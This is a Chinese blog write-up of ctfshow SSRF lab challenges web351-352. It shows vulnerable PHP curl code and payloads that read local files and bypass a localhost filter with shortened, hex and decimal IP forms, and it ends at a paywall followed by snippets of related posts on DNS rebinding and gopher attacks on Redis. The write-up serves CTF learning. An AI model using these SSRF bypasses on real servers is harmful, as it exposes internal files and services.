ctfshow web入门ssrf

最新推荐文章于 2024-09-17 10:55:16 发布

xiaolong22333

最新推荐文章于 2024-09-17 10:55:16 发布

阅读量1k

点赞数

文章标签： php web 网络安全

本文链接：https://blog.csdn.net/xiaolong22333/article/details/116211353

版权

其实刚接触时做过一遍，现在再做一遍巩固一下知识点

文章目录

- - web351
  - web352
  - web353
  - web354
  - web355
  - web356
  - web357
  - web358
  - web359
  - web360

web351

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?>

url=file:///var/www/html/flag.php
或者
url=http://127.0.0.1/flag.php

web352

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127.0.0/')){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?

ip地址中0可以省略，所以可以

url=http://127.1/flag.php
url=http://0/flag.php

或者进制绕过
IP地址转换

url=http://0x7F000001/flag.php
url=http://2130706

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

xiaolong22333

关注关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

CTF之web学习记录 -- SSRF

lifanxin的博客

06-29

1981

SSRF概述SSRF原理SSRF漏洞修复一道例题总结概述 SSRF(Server-Side Request Forgery)服务器端请求伪造，是一种由攻击者构造请求，服务器端发起请求的安全漏洞。当然之所以要这样曲折，是因为SSRF的目标一般是外网无法访问的内部系统，所以需要用服务器端发送。 SSRF原理 SSRF形成的原因在于服务器端提供了从其它服务器应用获取数据的功能且没有对目标地址做过滤和限制。通过该漏洞我们可以攻击内网的服务器，获取相应的资源信息，利用file协议读取内部网络文件等。如

【CTFSHOW】web入门SSRF

7ruth0hn的博客

06-21

1207

CTFSHOW web入门SSRF 发现学习渗透和ctf对xss,ssrf,csrf,ssti都有挺高要求的，一直没怎么系统刷过题。今天学习学习，补补之前落下的债(*￣3￣)╭ web351 扫描网站发现存在flag.php文件，通过分析和测试发现需要服务器本地访问，故使用传入127.0.0.1/flag.php web352 payload: web353 过滤代码： if($x['scheme']==='http'||$x['scheme']==='https'){ if(!preg_

参与评论您还未登录，请先登录后发表或查看评论

ctfshow-web入门 ssrf篇

volcano的博客

03-06

2502

ctfshowSSRF简介危害web351web352parse_urlweb353更改IP地址写法web354web355web356web357web358web359(打无密码的mysql)web360(打redis) SSRF 简介服务端请求伪造（Server Side Request Forgery, SSRF）指的是攻击者在未能取得服务器所有权限时，利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。危害 SSRF可以对外网、

CTFshow(web入门》》SSRF)

最新发布

guowu666的博客

09-17

244

第一题没有什么限制。直接写即可。

ctfshow web入门-ssrf

akxnxbshai的博客

05-13

782

目录开头： web 351 web 352 web 353 web 354 web 355 web 356 web 357 Web 358 Web 359 Web 360 开头：简单了解一下SSRF。 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下，SSRF攻击的目标是从外网无法访问的内部系统。（正是因为它是由服务端发起的，所以它能够请求到与它相连而与外网隔离的内部系统

CTFshow web入门 SSRF

Lum1n0us's Blog

07-17

520

web351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); ?> 第一题，啥也没

ctfshow——web入门-SSRF

2301_80481202的博客

04-10

836

要完成DNS重绑定攻击，我们需要一个域名，并且将这个域名的解析指定到我们自己的DNS Server，在我们的可控的DNS Server上编写解析服务，设置TTL时间为0。对于用户请求的URL参数，首先服务器端会对其进行DNS解析，然后对于DNS服务器返回的IP地址进行判断，如果在黑名单中，就pass掉。如果后端服务器在接收到参数后，正确的解析了URL的host，并且进行了过滤，我们这个时候可以使用302跳转的方式来进行绕过。如果成功，则返回已过滤的数据，如果失败，则返回 false。

CTFSHOW-WEB入门代码审计篇

Re_ly0n的博客

11-02

507

web301 漏洞点checklogin.php $sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;"; sqlmap一把梭出来账号密码登录拿到flag web302 更改部分 if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){ sqlmap跑出来账号密码却不知为何无法登录，然后尝试写

ctfshow web入门代码审计

12-10

CTF比赛中的Web入门题目通常是一些简单的Web应用程序，可以通过代码审计来发现漏洞并获取flag。以下是一些常见的Web漏洞和审计技巧： 1. SQL注入：通过构造恶意的SQL语句来绕过应用程序的身份验证和访问控制。...

ctfshow web入门序列化

Lumos427的博客

02-25

1566

序列化和反序列化 web254 <?php error_reporting(0); highlight_file(__FILE__); include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this-&gt

ctfshow web入门 SSRF(超详解)

qq_50589021的博客

09-08

6745

前言 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下，SSRF攻击的目标是从外网无法访问的内部系统。（正是因为它是由服务端发起的，所以它能够请求到与它相连而与外网隔离的内部系统） https://ctf-wiki.org/web/ssrf/ https://www.freebuf.com/articles/web/260806.html web351 <?php error_reporting(0)

ctfshow web入门 SSRF

Sentiment的博客

12-09

819

web351

ctfshow web 入门 ssrf

wsitcj的博客

02-25

226

351、curl造成的ssrf payload: 352、加了限定：这是从其他师傅那里拿来的payload： 353、同上吧，姿势随意一点！！ 354、看了yu4傅的wp，用到 http://sudo.cc/，这就是个解析到127.0.0.1的域名，直接用即可。 355、 ...

ctfshow--web入门--SSRF

weixin_74985952的博客

07-09

356

gethostbyname()这里对url对应的ip地址进行了检测，因此不能使用短网址，域名解析等手段了，只能采用重定向的方式，构建一个重定向的网页，跳转至http://127.0.0.1/flag.php即可,然后将文件放入服务器中，去访问它即可。这里一样的方法，攻击redis数据库，默认生成的文件名为shell.php，将payload中带有百分号的部分进行二次编码然后进行传参即可。源码中要求http://ctf.开头，以show结尾才可以进行读取url。最后在check.php页面进行传参。

ctf_show笔记篇（web入门---SSRF)

whale_waves的博客

04-04

1112

ssrf产生原理：服务端存在网络请求功能/函数，例如：file_get_contens()这一类类似于curl 这种函数传入的参数用户是可控的没有对用户输入做过滤导致的ssrf漏洞 ssrf利用: 用于探测内网服务以及端口探针存活主机以及开放服务探针是否存在redis服务(未授权访问, 相当于是可以访问到redis服务并且开发人员不严谨没有设置密码, 因为默认是没有密码的, 或者说开发者设置了密码但是是弱口令), 利用定时任务反弹shell

ctfshow web入门 ssrf web351~web360

qq_62989306的博客

09-13

1176

ssrf之127.0.0.1绕过、域名指向、302跳转、DNS重定向、gopher打mysql、redis……

ctfshow-web入门-ssrf-351--360

yutianovo的博客

01-14

824

Web351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); ?> 使用 file

ctfshow web入门(SSRF)

Blazing-Angel的博客

07-19

906

ctfshow

[ctfshow-web入门]SSRF

nareku的博客

07-22

872

上来就是代码审计ssrf就是利用我们可以访问到的服务器，对其服务器下面的内网进行探测，也可以理解为服务器拥有外网ip，而我们要访问的电脑则是在公网ip进行nat后分配的内网ip构造payload(POST方式）......